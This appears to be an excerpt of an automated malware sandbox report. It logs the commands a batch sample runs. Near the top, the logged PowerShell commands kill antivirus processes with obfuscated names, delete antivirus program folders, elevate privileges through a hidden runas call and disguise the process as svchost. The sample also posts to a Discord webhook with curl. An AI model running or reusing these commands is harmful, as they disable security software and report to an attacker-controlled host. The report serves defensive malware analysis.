        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$s='taskkill /f /im'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$paths = @(c:\program files\malwarebytes\*.*''c:\program files\alwils~1\avast4\*.*', 'c:\program files\lavasoft\ad-awa~1\*.exe', 'c:\program files\kasper~1\*.exe', 'c:\program files\trojan~1\*.exe', 'c:\program files\f-prot95\*.dll', 'c:\program files\tbav\*.dat', 'c:\program files\avpersonal\*.vdf', 'c:\program files\norton~1\*.cnt', 'c:\program files\mcafee\*.*', 'c:\program files\norton~1\norton~3\*.*', 'c:\program files\norton~1\norton~1\speedd~1\*.*', 'c:\program files\norton~1\norton~1\*.*', 'c:\program files\norton~1\*.*'); foreach ($p in $paths) { remove-item -path $p -force -recurse -erroraction silentlycontinue }"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -h "content-type: application/json" -d "{\"content\":\"failed to change directory to 'c:\\users\\public\\documents\\secret document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -h "content-type: application/json" -d "{\"content\":\"failed to create and change directory to 'c:\\users\\public\\documents\\secret document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd' -method post -body (@{content='failed to download exe.exe'} | convertto-json) -contenttype 'application/json'"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$process = get-process -id $pid; $process.processoraffinity = 1; $process.priorityclass = 'high'; $process.priorityboostenabled = $true; add-type -typedefinition 'using system; using system.runtime.interopservices; public class win32 { [dllimport(\"user32.dll\")] public static extern bool setwindowdisplayaffinity(intptr hwnd, uint dwaffinity); [dllimport(\"kernel32.dll\")] public static extern bool setprocessworkingsetsize(intptr proc, int min, int max); }'; [win32]::setwindowdisplayaffinity($process.mainwindowhandle, 0x11); [win32]::setprocessworkingsetsize($process.handle, -1, -1); $process.processname = 'svchost'" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$currentprincipal = new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent()); if (-not $currentprincipal.isinrole([security.principal.windowsbuiltinrole]::administrator)) { start-process -filepath 'cmd.exe' -argumentlist '/c c:\users\user\desktop\main.bat.bin.bat' -verb runas -windowstyle hidden; exit }; $process = get-process -id $pid; $process.priorityclass = 'high'; $process.processoraffinity = 1; $process.priorityboostenabled = $true" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { stop-process -name $p -force -erroraction silentlycontinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$s='taskkill /f /im'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$paths = @(c:\program files\malwarebytes\*.*''c:\program files\alwils~1\avast4\*.*', 'c:\program files\lavasoft\ad-awa~1\*.exe', 'c:\program files\kasper~1\*.exe', 'c:\program files\trojan~1\*.exe', 'c:\program files\f-prot95\*.dll', 'c:\program files\tbav\*.dat', 'c:\program files\avpersonal\*.vdf', 'c:\program files\norton~1\*.cnt', 'c:\program files\mcafee\*.*', 'c:\program files\norton~1\norton~3\*.*', 'c:\program files\norton~1\norton~1\speedd~1\*.*', 'c:\program files\norton~1\norton~1\*.*', 'c:\program files\norton~1\*.*'); foreach ($p in $paths) { remove-item -path $p -force -recurse -erroraction silentlycontinue }"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s -h "content-type: application/json" -d "{\"content\":\"failed to create and change directory to 'c:\\users\\public\\documents\\secret document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/ddrktnqfrsrxeveloz3obg6_ldiuneiwcygzbdn-1uixnmnnz7zmzvkklapf0rrihbjd' -method post -body (@{content='failed to download exe.exe'} | convertto-json) -contenttype 'application/json'"Jump to behavior
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2707544758.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2707544758.0000000005360000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000017.00000002.2699218188.0000000001439000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman'
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
